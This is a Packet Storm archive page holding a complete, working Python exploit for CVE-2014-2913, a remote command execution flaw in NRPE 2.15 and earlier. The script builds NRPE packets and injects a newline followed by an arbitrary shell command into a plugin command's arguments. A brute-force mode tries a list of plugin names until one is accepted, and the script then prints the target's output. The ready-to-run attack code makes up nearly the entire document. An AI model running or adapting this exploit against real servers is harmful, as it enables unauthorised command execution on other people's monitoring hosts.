what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NRPE 2.15 Remote Command Execution

NRPE 2.15 Remote Command Execution
Posted Aug 28, 2014
Authored by Dawid Golunski, Claudio Viviani

NRPE version 2.15 remote command execution exploit written in Python.

tags | exploit, remote, python
advisories | CVE-2014-2913
SHA-256 | c268de70bbf269dcf7e9d20818207c8f9d7979d2b3054cdd2d722e64c5890c38

NRPE 2.15 Remote Command Execution

Change Mirror Download
#!/usr/bin/python
#
#
# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability
#
# Discovered by : Dawid Golunski
# dawid (at) legalhackers (dot) com
# legalhackers.com
#
# Exploit Author : Claudio Viviani
# http://www.homelab.it
#
# info@homelab.it
# homelabit@protonmail.ch
#
# https://www.facebook.com/homelabit
# https://twitter.com/homelabit
# https://plus.google.com/+HomelabIt1/
# https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#
#
#
# C crc32 function ripped from check_nrpe_clone by Alan Brenner <alan.brenner@ithaka.org>
# http://www.abcompcons.com/files/nrpe_client.py
#
# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)
#
# [root@localhost ~]# pip-python install pyOpenSSL
#
# NRPE <= 2.15 Remote Command Execution Vulnerability
# Release date: 17.04.2014
# Discovered by: Dawid Golunski
# Severity: High
# CVE-2014-2913
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913
# http://www.exploit-db.com/exploits/32925/
# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)
#
# Tested on CentOS 5.x, CentOS 6.x, BacBox 3.x, KaliLinux 1.0.6 with Python 2.x
#
# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE
#

import OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/
import optparse
import os
import signal
import socket
import struct
import sys
import time

banner = """

$$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$$$$$$\\
$$$\ $$ |$$ __$$\ $$ __$$\ $$ _____| $$ __$$\ $$$$ | $$ ____|
$$$$\ $$ |$$ | $$ |$$ | $$ |$$ | \__/ $$ | \_$$ | $$ |
$$ $$\$$ |$$$$$$$ |$$$$$$$ |$$$$$\ $$$$$$ | $$ | $$$$$$$\\
$$ \$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \_____$$\\
$$ |\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\ $$ |
$$ | \$$ |$$ | $$ |$$ | $$$$$$$$\ $$$$$$$$\ $$\ $$$$$$\\$$$$$$ |
\__| \__|\__| \__|\__| \________| \________|\__|\______|\______/



$$$$$$$\ $$$$$$\ $$$$$$$$\\
$$ __$$\ $$ __$$\ $$ _____|
$$ | $$ |$$ / \__|$$ |
$$$$$$$ |$$ | $$$$$\\
$$ __$$< $$ | $$ __|
$$ | $$ |$$ | $$\ $$ |
$$ | $$ |\$$$$$$ |$$$$$$$$\\
\__| \__| \______/ \________|
NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n


=============================================
- Release date: 17.04.2014
- Discovered by: Dawid Golunski
- Severity: High
- CVE: 2014-2913
=============================================

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""
# Plugin list for Brute force mode
PluginList = ['check_all',
'check_apt',
'check_bdii',
'check_bonding',
'check_breeze',
'check_by_ssh',
'check_check-updates',
'check_check_sip',
'check_cluster',
'check_dhcp',
'check_dig',
'check_disk',
'check_disk_smb',
'check_dns',
'check_dpm-disk',
'check_dpm-head',
'check_dummy',
'check_file_age',
'check_flexlm',
'check_fping',
'check_game',
'check_hpjd',
'check_http',
'check_icmp',
'check_ide_smart',
'check_ifoperstatus',
'check_ifstatus',
'check_ircd',
'check_lcgdm',
'check_lcgdm-common',
'check_ldap',
'check_lfc',
'check_linux_raid',
'check_load',
'check_log',
'check_mailq',
'check_mrtg',
'check_mrtgtraf',
'check_mysql',
'check_nagios',
'check_nrpe',
'check_nt',
'check_ntp',
'check_nwstat',
'check_openmanage',
'check_oracle',
'check_overcr',
'check_perl',
'check_pgsql',
'check_ping',
'check_procs',
'check_radius',
'check_real',
'check_rhev',
'check_rpc',
'check_sensors',
'check_smtp',
'check_snmp',
'check_ssh',
'check_swap',
'check_tcp',
'check_time',
'check_ups',
'check_users',
'check_wave']



# nrpe 2.15 skip chars "|`&><'\"\\[]{};" and "$()" but not "\x0a"(new line)
evilchar = "\x0a"

QUERY_PACKET = 1
RESPONSE_PACKET = 2

NRPE_PACKET_VERSION_2 = 2

# max amount of data we'll send in one query/response
MAX_PACKETBUFFER_LENGTH = 1024


#def debug(sMessage):
# """Send a string to STDERR"""
# if DEBUG:
# sys.stderr.write("%s\n" % sMessage)

class DataPacket:
"""A Python implementation of the C struct, packet."""
def __init__(self, packet_version, packet_type):
self.nPacketVersion = packet_version # int16
self.nPacketType = packet_type # int16
self.nCRC32 = 0 # u_int32
self.nResultCode = 2324 # int16
self.sData = ''
self.tCRC32 = (
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,
0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,
0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,
0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,
0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,
0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,
0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,
0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,
0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,
0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,
0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,
0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,
0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,
0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,
0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,
0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,
0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,
0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,
0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,
0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,
0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,
0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,
0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,
0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,
0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,
0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,
0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,
0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,
0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,
0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,
0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,
0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,
0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,
0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,
0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
0x2d02ef8d)

def __str__(self):
# Turn whatever string data we have into a null terminated string
if len(self.sData) < MAX_PACKETBUFFER_LENGTH:
sData = self.sData + "\0" * (MAX_PACKETBUFFER_LENGTH - len(self.sData))
sData += "SR" # not sure about this, from perl
elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:
sData = self.sData
else:
raise ValueError("CHECK_NRPE: invalid input")
# Return a string that equals the C struct, not something printable
return struct.pack("!hhLh" + str(len(sData)) + "s", self.nPacketVersion,
self.nPacketType, self.nCRC32, self.nResultCode, sData)

def __len__(self):
return len(self.__str__())

def dumpself(self):
"""Debugging output for self as C structure.

Not normally used."""
sElf = self.__str__()
sPrev = sElf[0:1]
nCount = 0
ii = -1
for sChar in sElf[1:]:
ii += 1
if sChar == sPrev:
nCount += 1
continue
if nCount:
print "%d\t%d *" % (ii - nCount, nCount + 1),
nCount = 0
else:
print "%d\t" % ii,
print "\t'%s' (%d)" % (sPrev, ord(sPrev))
sPrev = sChar
print "%d\t\t'%s' (%d)" % (ii + 1, sPrev, ord(sPrev))

def calculate_crc32(self):
"""Calculate the CRC32 value for the string version of self."""
nCRC = 0xFFFFFFFF
for ii in self.__str__():
nIndex = (nCRC ^ ord(ii)) & 0xFF
nCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex]
self.nCRC32 = nCRC ^ 0xFFFFFFFF
#debug("DataPacket.calculate_crc32 = %d" % self.nCRC32)

def extract(self, sQuery):
"""Turn a string into the DataPacket attributes."""
#debug("DataPacket.extract(%d)" % len(sQuery))
tVals = struct.unpack("!hhLh" + str(len(sQuery) - 10) + "s", sQuery)
self.nPacketVersion = tVals[0]
self.nPacketType = tVals[1]
self.nCRC32 = tVals[2]
self.nResultCode = tVals[3]
self.sData = tVals[4]

m_nTimeout = 0
def alarm_handler(nSignum, oFrame):
"""Timeout catcher"""
raise KeyboardInterrupt("CHECK_NRPE: Socket timeout after %d seconds." %
m_nTimeout)


class NrpeClient(DataPacket):
"""Everything needed to send a message to an NRPE server and get data back.
"""
def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,
packet_version=NRPE_PACKET_VERSION_2):
DataPacket.__init__(self, packet_version, QUERY_PACKET)
self.sServer = server_name
self.nPort = server_port
self.bUseSSL = use_ssl
self.nTimeout = timeout

def run_query(self, sQuery):
"""Connect to the NRPE server, send the query and get back data.
"""
# initialize alarm signal handling and set timeout
signal.signal(signal.SIGALRM, alarm_handler)
signal.alarm(self.nTimeout)

# try to connect to the host at the given port number
oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# do SSL handshake
if self.bUseSSL:
oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
oContext.set_cipher_list('ADH')
oConnection = OpenSSL.SSL.Connection(oContext, oSocket)
else:
oConnection = oSocket

oConnection.connect((self.sServer, self.nPort))

# we're connected and ready to go
self.sData = sQuery
self.nCRC32 = 0
self.calculate_crc32()

# send the packet
oConnection.send(str(self))

# wait for the response packet
sRval = oConnection.recv(len(self))

# close the connection
if self.bUseSSL and not oConnection.shutdown():
try:
sRval += oConnection.recv(len(self))
except OpenSSL.SSL.ZeroReturnError:
pass
oSocket.close()
del oSocket, oConnection
if self.bUseSSL:
del oContext

# reset timeout
signal.alarm(0)

if len(sRval) == 0:
raise IOError("CHECK_NRPE: Received 0 bytes from daemon." +
"Check the remote server logs for error messages.")
elif len(sRval) < len(self):
raise IOError("CHECK_NRPE: Receive underflow - only " +
"%d bytes received (%d expected)." % (len(sRval), len(self)))

# Become the received data
self.extract(sRval)

# check the crc 32 value
nRvalCRC = self.nCRC32
self.nCRC32 = 0
self.calculate_crc32()
if nRvalCRC != self.nCRC32:
raise ValueError("CHECK_NRPE: Response packet had invalid CRC32.")

# check packet version
if self.nPacketVersion != NRPE_PACKET_VERSION_2:
raise ValueError("CHECK_NRPE: Invalid packet version received from server.")

# check packet type
if self.nPacketType != RESPONSE_PACKET:
raise ValueError("CHECK_NRPE: Invalid packet type received from server.")

# Turn the input data into a proper python string (chop at first NULL)
for ii in range(len(self.sData)):
if self.sData[ii] == "\0":
break
self.sData = self.sData[0:ii]


if __name__ == '__main__':
m_oOpts = optparse.OptionParser("%prog -H Host_or_IP -c nrpe_command --cmd=\"command to execute\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]")
m_oOpts.add_option('--host', '-H', action='store', type='string',
help='The address of the host running the NRPE daemon (required)')
m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,
help='Do no use SSL')
m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,
help='The port on which the daemon is running (default=5666)')
m_oOpts.add_option('--timeout', '-t', action='store', type='int',
default=10,
help='Number of seconds before connection times out (default=10)')
m_oOpts.add_option('--command', '-c', action='store', type='string',
#default='get_data',
help='The name of nrpe command')
m_oOpts.add_option('--brute', '-b', action='store_true', default=False,
help='Find existing nrpe command from list [ -list ]')
m_oOpts.add_option('--list', action='store_true', default=False,
help='Show NRPE Command list')
m_oOpts.add_option('--cmd', action='store', type='string',
help='Command to execute on the remote server')

m_oOptions, m_lArgs = m_oOpts.parse_args()
m_nTimeout = m_oOptions.timeout
m_sQuery = m_oOptions.command
m_gList = m_oOptions.list
m_sBrute = m_oOptions.brute

print (banner)

if m_gList:
print('[+] NRPE Command list\n')
for LinesPluginList in PluginList:
print(LinesPluginList)
sys.exit(0)
elif m_sQuery and m_sBrute:
print m_oOpts.format_help()
print('[!]')
print('[!] ERROR: Select only -c OR -b option\n')
sys.exit(0)
elif not m_oOptions.host or not m_oOptions.cmd:
print m_oOpts.format_help()
sys.exit(0)

print('[+] Target: '+m_oOptions.host)
print('[+] Command: '+m_oOptions.cmd+' \n')

if m_sBrute:
print('[+] Brute force Mode....')
print('[+]')
for LinesPluginList in PluginList:

m_CommandQuery = ""
m_CommandQuery += ' ' + m_oOptions.cmd
if m_lArgs:
m_CommandQuery += ' ' + ' '.join(m_lArgs)

m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'


m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
m_oOptions.timeout)
try:
m_oNRPE.run_query(m_sQuery)
except socket.error:
print('[!] Connection Error!')
sys.exit(1)
except OpenSSL.SSL.ZeroReturnError:
print('[!] Not Vulnerable')
print('[!] Option dont_blame_nrpe disabled or service fixed')
sys.exit(1)

if m_oNRPE.sData[-11:] == "not defined":
print('[-] Checking for NRPE command '+LinesPluginList+':\t\t\tnot found')
else:
print('[+] Checking for NRPE command '+LinesPluginList+':\t\t\tVULNERABLE!')
print('[+]')
print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
print('[+]')
print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
print('[+]')
print(m_oNRPE.sData)
sys.exit(0)
elif m_sQuery:
print('[+] Custom command Mode....')
print('[+]')
print('[+] Connecting......')

m_CommandQuery = ""
m_CommandQuery += ' ' + m_oOptions.cmd
if m_lArgs:
m_CommandQuery += ' ' + ' '.join(m_lArgs)

m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'

m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
m_oOptions.timeout)
try:
m_oNRPE.run_query(m_sQuery)
except KeyboardInterrupt:
print("[!] CHECK_NRPE: Socket timeout after %d seconds." % m_nTimeout)
sys.exit(1)
except socket.error:
print('[!] Connection Error!')
sys.exit(1)
except OpenSSL.SSL.ZeroReturnError:
print('[!] Not Vulnerable')
print('[!] Option dont_blame_nrpe disabled or service fixed')
sys.exit(1)

if m_oNRPE.sData[-11:] == "not defined":
print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')
else:
print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')
print('[+]')
print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
print('[+]')
print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
print('[+]')
print(m_oNRPE.sData)
sys.exit(0)

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close